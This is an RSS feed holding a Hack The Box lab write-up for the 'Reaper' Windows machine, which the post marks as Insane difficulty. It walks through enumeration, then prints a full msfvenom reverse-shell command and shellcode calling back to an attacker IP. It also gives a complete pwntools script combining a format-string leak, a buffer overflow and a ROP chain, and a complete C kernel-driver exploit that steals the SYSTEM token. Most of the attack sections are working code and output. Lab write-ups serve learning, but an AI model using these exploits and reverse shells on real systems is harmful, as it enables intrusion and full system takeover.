<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:googleplay="http://www.google.com/schemas/play-podcasts/1.0"><channel><title><![CDATA[AdverXarial]]></title><description><![CDATA[Cybersecurity Write-Ups]]></description><link>https://byt3n33dl3.substack.com</link><image><url>https://substackcdn.com/image/fetch/$s_!erPj!,w_256,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb46fb88c-202a-453e-9df1-395f37a4991b_492x492.png</url><title>AdverXarial</title><link>https://byt3n33dl3.substack.com</link></image><generator>Substack</generator><lastBuildDate>Sat, 09 May 2026 03:17:06 GMT</lastBuildDate><atom:link href="https://byt3n33dl3.substack.com/feed" rel="self" type="application/rss+xml"/><copyright><![CDATA[byt3n33dl3]]></copyright><language><![CDATA[en]]></language><webMaster><![CDATA[byt3n33dl3@pm.me]]></webMaster><itunes:owner><itunes:email><![CDATA[byt3n33dl3@pm.me]]></itunes:email><itunes:name><![CDATA[Sulaiman]]></itunes:name></itunes:owner><itunes:author><![CDATA[Sulaiman]]></itunes:author><googleplay:owner><![CDATA[byt3n33dl3@pm.me]]></googleplay:owner><googleplay:email><![CDATA[byt3n33dl3@pm.me]]></googleplay:email><googleplay:author><![CDATA[Sulaiman]]></googleplay:author><itunes:block><![CDATA[Yes]]></itunes:block><item><title><![CDATA[HTB Reaper - Windows (Insane)]]></title><description><![CDATA[Analyze with Ghidra upon vulnerable binary leading to buffer-overflow via multiple bind, case and controlling the CEH. Gain NT SYSTEM access via Driver attack by abuse permits arbitrary kernel-level.]]></description><link>https://byt3n33dl3.substack.com/p/htb-reaper-windows-insane</link><guid isPermaLink="false">https://byt3n33dl3.substack.com/p/htb-reaper-windows-insane</guid><dc:creator><![CDATA[Sulaiman]]></dc:creator><pubDate>Mon, 27 Apr 2026 13:52:16 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!PDs4!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9a82203-070b-47cc-ac7d-50ea552ccd32_728x528.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!PDs4!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9a82203-070b-47cc-ac7d-50ea552ccd32_728x528.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!PDs4!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9a82203-070b-47cc-ac7d-50ea552ccd32_728x528.png 424w, https://substackcdn.com/image/fetch/$s_!PDs4!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9a82203-070b-47cc-ac7d-50ea552ccd32_728x528.png 848w, https://substackcdn.com/image/fetch/$s_!PDs4!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9a82203-070b-47cc-ac7d-50ea552ccd32_728x528.png 1272w, https://substackcdn.com/image/fetch/$s_!PDs4!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9a82203-070b-47cc-ac7d-50ea552ccd32_728x528.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!PDs4!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9a82203-070b-47cc-ac7d-50ea552ccd32_728x528.png" width="728" height="528" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e9a82203-070b-47cc-ac7d-50ea552ccd32_728x528.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:528,&quot;width&quot;:728,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:209222,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193173592?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9a82203-070b-47cc-ac7d-50ea552ccd32_728x528.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!PDs4!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9a82203-070b-47cc-ac7d-50ea552ccd32_728x528.png 424w, https://substackcdn.com/image/fetch/$s_!PDs4!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9a82203-070b-47cc-ac7d-50ea552ccd32_728x528.png 848w, https://substackcdn.com/image/fetch/$s_!PDs4!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9a82203-070b-47cc-ac7d-50ea552ccd32_728x528.png 1272w, https://substackcdn.com/image/fetch/$s_!PDs4!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9a82203-070b-47cc-ac7d-50ea552ccd32_728x528.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><em>From HTB: -</em></p><p>This write-up is going to be straight-forward:</p><ul><li><p>Gain User</p></li><li><p>Gain NT SYSTEM</p></li></ul><ol><li><p><em>Network Enumeration and Port Discovery</em></p></li></ol><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;cf469eb7-c37e-4a86-9d98-bc4d66a6c269&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ ping -c2 10.129.234.200
PING 10.129.234.200 (10.129.234.200) 56(84) bytes of data.
64 bytes from 10.129.234.200: icmp_seq=1 ttl=127 time=112 ms

--- 10.129.234.200 ping statistics ---
2 packets transmitted, 1 received, 50% packet loss, time 1008ms
rtt min/avg/max/mdev = 112.315/112.315/112.315/0.000 ms</code></pre></div><p>Continue with Nmap Scanning:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ sudo nmap -Pn -p- --min-rate 8000 10.129.234.200 -oA nmap/nmap
[sudo] password for byt3n33dl3: 
Starting Nmap 7.98 ( https://nmap.org ) at 
Nmap scan report for 10.129.234.200
Host is up (0.12s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
3389/tcp open  ms-wbt-server
4141/tcp open  oirtgsvc
5040/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in seconds</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ sudo nmap -Pn -p21,80,3389,4141,5040 -sC -sV 10.129.234.200 -oA nmap/nmap-port
Starting Nmap 7.98 ( https://nmap.org ) at
Nmap scan report for 10.129.234.200
Host is up (0.11s latency).

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 08-15-23  12:12AM                  262 dev_keys.txt
|_08-14-23  02:53PM               187392 dev_keysvc.exe
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows                                                                                                                                                                                                                   
3389/tcp open  ms-wbt-server Microsoft Terminal Services                                                                                                                                                                                    
| ssl-cert: Subject: commonName=reaper                                                                                                                                                                                                      
| Not valid before: 2026-04-03T15:22:10                                                                                                                                                                                                     
|_Not valid after:  2026-10-03T15:22:10                                                                                                                                                                                                     
4141/tcp open  oirtgsvc?                                                                                                                                                                                                                    
| fingerprint-strings:                                                                                                                                                                                                                      
|   GenericLines:                                                                                                                                                                                                                           
|     Choose an option:                                                                                                                                                                                                                     
|     Activate key                                                                                                                                                                                                                          
. . .[SNIP]. . .
|     Activate key
|_    Exit
5040/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4141-TCP:V=7.98%I=7%D=4/4%Time=69D12DE4%P=x86_64-pc-linux-gnu%r(NUL
. . .[SNIP]. . .
SF:\0Choose\x20an\x20option:\n1\.\x20Set\x20key\n2\.\x20Activate\x20key\n3
SF:\.\x20Exit\n");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 209.07 seconds</code></pre></div><p>NMAP Scan reveal:</p><ul><li><p>Anonymous FTP (Binary potential break-point)</p></li><li><p>Interactive Port (Potential Buffer)</p></li></ul><ol start="2"><li><p><em>Anonymous FTP</em></p></li></ol><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">ftp&gt; ls
229 Entering Extended Passive Mode (|||5001|)
150 Opening ASCII mode data connection.
08-15-23  12:12AM                  262 dev_keys.txt
08-14-23  02:53PM               187392 dev_keysvc.exe
226 Transfer complete.
ftp&gt;</code></pre></div><ol start="3"><li><p><em>Attack Script for User Access</em></p></li></ol><ul><li><p>msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.20 LPORT=9001 -f python -v shellcode</p></li></ul><p>MSFVenom Shellcode Script:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.20 LPORT=9001 -f python -v shellcode
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of python file: 2571 bytes
shellcode =  b""
shellcode += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41"
shellcode += b"\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48"
shellcode += b"\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20"
shellcode += b"\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31"
shellcode += b"\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20"
shellcode += b"\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41"
shellcode += b"\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0"
shellcode += b"\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67"
shellcode += b"\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20"
shellcode += b"\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34"
shellcode += b"\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac"
shellcode += b"\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1"
shellcode += b"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58"
shellcode += b"\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
shellcode += b"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
shellcode += b"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a"
shellcode += b"\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41"
shellcode += b"\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
shellcode += b"\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f"
shellcode += b"\x33\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81"
shellcode += b"\xec\xa0\x01\x00\x00\x49\x89\xe5\x49\xbc\x02"
shellcode += b"\x00\x23\x29\x0a\x0a\x0e\x14\x41\x54\x49\x89"
shellcode += b"\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff"
shellcode += b"\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41"
shellcode += b"\xba\x29\x80\x6b\x00\xff\xd5\x50\x50\x4d\x31"
shellcode += b"\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2\x48"
shellcode += b"\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0"
shellcode += b"\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89"
shellcode += b"\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff"
shellcode += b"\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63"
shellcode += b"\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50"
shellcode += b"\x48\x89\xe2\x57\x57\x57\x4d\x31\xc0\x6a\x0d"
shellcode += b"\x59\x41\x50\xe2\xfc\x66\xc7\x44\x24\x54\x01"
shellcode += b"\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89"
shellcode += b"\xe6\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff"
shellcode += b"\xc0\x41\x50\x49\xff\xc8\x4d\x89\xc1\x4c\x89"
shellcode += b"\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5\x48\x31"
shellcode += b"\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d"
shellcode += b"\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6"
shellcode += b"\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06"
shellcode += b"\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72"
shellcode += b"\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5"</code></pre></div><p>Whole script (attack.py)</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">#!/usr/bin/python3
from pwn import remote, p64, base64

shell = remote("10.129.234.200", 4141)

shell.sendlineafter(b"Exit\n", b"1")
shell.sendlineafter(b"key: ", b"100-FE9A1-500-A270-0102-")
shell.sendlineafter(b"Exit\n", b"1")
shell.sendlineafter(b"key: ", b"%p")
shell.sendlineafter(b"Exit\n", b"2")
shell.recvuntil(b"Checking key: ")

binary_base = int(shell.recvline().strip(), 16) - 0x20660

offset = 88
junk = b"A" * offset

rop  = b""
rop += p64(binary_base + 0x020d9) # pop rbx; ret;
rop += p64(0x1000)                # flAllocationType
rop += p64(binary_base + 0x01f90) # mov r9, rbx; mov r8, 0; add rsp, 8; ret;
rop += p64(0x0)                   # padding for pop
rop += p64(binary_base + 0x03918) # add r8, r9; add rax, r8; ret;
rop += p64(binary_base + 0x0150a) # pop rax; ret;
rop += p64(binary_base + 0x0150a) # pop rax; ret;
rop += p64(binary_base + 0x047b3) # pop r13; ret;
rop += p64(0x40)                  # flProtect
rop += p64(binary_base + 0x0368f) # mov rdx, r13; call rax;
rop += p64(binary_base + 0x1f27f) # xor rax, rax; ret;
rop += p64(binary_base + 0x1f37d) # cmove r9, rdx; mov rax, r9; ret;
rop += p64(binary_base + 0x0150a) # pop rax; ret;
rop += p64(binary_base + 0x0150a) # pop rax; ret;
rop += p64(binary_base + 0x047b3) # pop r13; ret;
rop += p64(0x1)                   # dwSize
rop += p64(binary_base + 0x0368f) # mov rdx, r13; call rax;
rop += p64(binary_base + 0x020d9) # pop rbx; ret;
rop += p64(0x0)                   # key for xor
rop += p64(binary_base + 0x01fa0) # xor rbx, rsp; ret;
rop += p64(binary_base + 0x01fc2) # push rbx; pop rax; ret;
rop += p64(binary_base + 0x01f80) # mov rcx, rax; ret;
rop += p64(binary_base + 0x020d9) # pop rbx; ret;
rop += p64(binary_base + 0x20000) # VirtualAlloc()
rop += p64(binary_base + 0x1ec79) # jmp qword ptr [rbx];
rop += p64(binary_base + 0x02029) # add rsp, 0x10; ret;
rop += p64(0x0) * 2               # padding for add
rop += p64(binary_base + 0x1becd) # push rsp; and al, 8; ret;

shellcode =  b""
shellcode += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41"
shellcode += b"\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48"
shellcode += b"\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20"
shellcode += b"\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31"
shellcode += b"\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20"
shellcode += b"\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41"
shellcode += b"\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0"
shellcode += b"\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67"
shellcode += b"\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20"
shellcode += b"\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34"
shellcode += b"\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac"
shellcode += b"\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1"
shellcode += b"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58"
shellcode += b"\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
shellcode += b"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
shellcode += b"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a"
shellcode += b"\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41"
shellcode += b"\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
shellcode += b"\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f"
shellcode += b"\x33\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81"
shellcode += b"\xec\xa0\x01\x00\x00\x49\x89\xe5\x49\xbc\x02"
shellcode += b"\x00\x23\x29\x0a\x0a\x0e\x14\x41\x54\x49\x89"
shellcode += b"\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff"
shellcode += b"\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41"
shellcode += b"\xba\x29\x80\x6b\x00\xff\xd5\x50\x50\x4d\x31"
shellcode += b"\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2\x48"
shellcode += b"\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0"
shellcode += b"\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89"
shellcode += b"\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff"
shellcode += b"\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63"
shellcode += b"\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50"
shellcode += b"\x48\x89\xe2\x57\x57\x57\x4d\x31\xc0\x6a\x0d"
shellcode += b"\x59\x41\x50\xe2\xfc\x66\xc7\x44\x24\x54\x01"
shellcode += b"\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89"
shellcode += b"\xe6\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff"
shellcode += b"\xc0\x41\x50\x49\xff\xc8\x4d\x89\xc1\x4c\x89"
shellcode += b"\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5\x48\x31"
shellcode += b"\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d"
shellcode += b"\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6"
shellcode += b"\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06"
shellcode += b"\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72"
shellcode += b"\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5"

payload  = b""
payload += junk
payload += rop
payload += shellcode

shell.sendlineafter(b"Exit\n", b"1")
shell.sendlineafter(b"key: ", b"100-FE9A1-500-A270-0102-" + base64.b64encode(payload))
shell.sendlineafter(b"Exit\n", b"2")</code></pre></div><p>And gain Access:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ python3 attack.py
[+] Opening connection to 10.129.234.200 on port 4141: Done
[*] Closed connection to 10.129.234.200 port 4141</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.20] from (UNKNOWN) [10.129.234.200] 58420
Microsoft Windows [Version 10.0.19045.6216]
(c) Microsoft Corporation. All rights reserved.

C:\keysvc&gt;whoami
whoami
reaper\keysvc

C:\keysvc&gt;hostname 
hostname
reaper</code></pre></div><ol start="4"><li><p><em>Discover Revers-able SYS</em></p></li></ol><p>After enumeration, we found file containing path to SYSTEM access via binary hijack:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">PS C:\keysvc&gt; cd C:\driver                                                                                                                                                                                                                  
cd C:\driver                                                                                                                                                                                                                                
PS C:\driver&gt; dir                                                                                                                                                                                                                           
dir                                                                                                                                                                                                                                         
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            
    Directory: C:\driver


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----         7/27/2023   9:12 AM           8432 reaper.sys                                                           


PS C:\driver&gt;</code></pre></div><ol start="5"><li><p><em>Attack Script and Binary for NT SYSTEM Access</em></p></li></ol><p>Finally we have everything to create out C based application, ready to be an executable:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">#include &lt;windows.h&gt;
#include &lt;stdio.h&gt;
#include &lt;psapi.h&gt;

#define IOCTL_ALLOC 0x80002003
#define IOCTL_FREE  0x80002007
#define IOCTL_COPY  0x8000200b

#define OFFSET_Token 0x4b8
#define OFFSET_UniqueProcessId 0X440
#define OFFSET_ActiveProcessLinks 0x448

#define QWORD ULONGLONG

typedef struct ReaperData {
    DWORD Magic;
    DWORD ThreadId;
    DWORD Priority;
    DWORD Empty;
    QWORD SrcAddress;
    QWORD DstAddress;
} ReaperData;

VOID ArbitraryWrite(HANDLE hDevice, QWORD what, QWORD where) {
    ReaperData userData;

    userData.Magic = 0x6a55cc9e;
    userData.ThreadId = GetCurrentThreadId();
    userData.Priority = 0;
    userData.SrcAddress = what;
    userData.DstAddress = where;

    DeviceIoControl(hDevice, IOCTL_ALLOC,(LPVOID) &amp;userData, (DWORD) sizeof(struct ReaperData), NULL, 0, NULL, NULL);
    DeviceIoControl(hDevice, IOCTL_FREE, (LPVOID) NULL, (DWORD) 0, NULL, 0, NULL, NULL);
    DeviceIoControl(hDevice, IOCTL_COPY, (LPVOID) NULL, (DWORD) 0, NULL, 0, NULL, NULL);
}

QWORD ArbitraryRead(HANDLE hDevice, QWORD where) {
    QWORD output;
    ReaperData userData;

    userData.Magic = 0x6a55cc9e;
    userData.ThreadId = GetCurrentThreadId();
    userData.Priority = 0;
    userData.SrcAddress = where;
    userData.DstAddress = (QWORD) &amp;output;

    DeviceIoControl(hDevice, IOCTL_ALLOC,(LPVOID) &amp;userData, (DWORD) sizeof(struct ReaperData), NULL, 0, NULL, NULL);
    DeviceIoControl(hDevice, IOCTL_FREE, (LPVOID) NULL, (DWORD) 0, NULL, 0, NULL, NULL);
    DeviceIoControl(hDevice, IOCTL_COPY, (LPVOID) NULL, (DWORD) 0, NULL, 0, NULL, NULL);

    return output;
}

QWORD GetSystemEProcess(HANDLE hDevice, QWORD kernelBase) {
    HMODULE hKernel = LoadLibraryA("C:\\Windows\\System32\\ntoskrnl.exe");

    QWORD userPsInitialProcess = (QWORD) GetProcAddress(hKernel, "PsInitialSystemProcess");
    QWORD offsetPsInitialProcess = userPsInitialProcess - (QWORD) hKernel;
    QWORD kernelPsInitialProcess = kernelBase + offsetPsInitialProcess;

    QWORD systemEProcess = ArbitraryRead(hDevice, kernelPsInitialProcess);

    FreeLibrary(hKernel);
    return systemEProcess;
}

QWORD GetCurrentEProcess(HANDLE hDevice, QWORD systemEProcess) {
    QWORD currentEProcess = systemEProcess;
    DWORD currentProcessId = GetCurrentProcessId();

    while (TRUE) {
        QWORD processLinkAddress = ArbitraryRead(hDevice, currentEProcess + OFFSET_ActiveProcessLinks);
        QWORD processId = ArbitraryRead(hDevice, processLinkAddress - OFFSET_ActiveProcessLinks + OFFSET_UniqueProcessId);

        currentEProcess = processLinkAddress - OFFSET_ActiveProcessLinks;

        if ((DWORD) processId == currentProcessId) {
            break;
        }
    }

    return currentEProcess;
}

QWORD GetKernelBase() {
    LPVOID drivers[1024];
    DWORD cbNeeded;

    EnumDeviceDrivers(drivers, sizeof(drivers), &amp;cbNeeded);
    return (QWORD) drivers[0];
}

int main() {
    HANDLE hDevice = CreateFileA("\\\\.\\Reaper", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);

    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to get handle: 0x%x\n", GetLastError());
        exit(EXIT_FAILURE);
    }

    QWORD systemEProcess = GetSystemEProcess(hDevice, GetKernelBase());
    QWORD currentEProcess = GetCurrentEProcess(hDevice, systemEProcess);

    ArbitraryWrite(hDevice, systemEProcess + OFFSET_Token, currentEProcess + OFFSET_Token);
    CloseHandle(hDevice);

    system("cmd.exe");
    return 0;
}</code></pre></div><p>Then convert:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ sudo x86_64-w64-mingw32-gcc pwn.c -o pwn.exe

&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
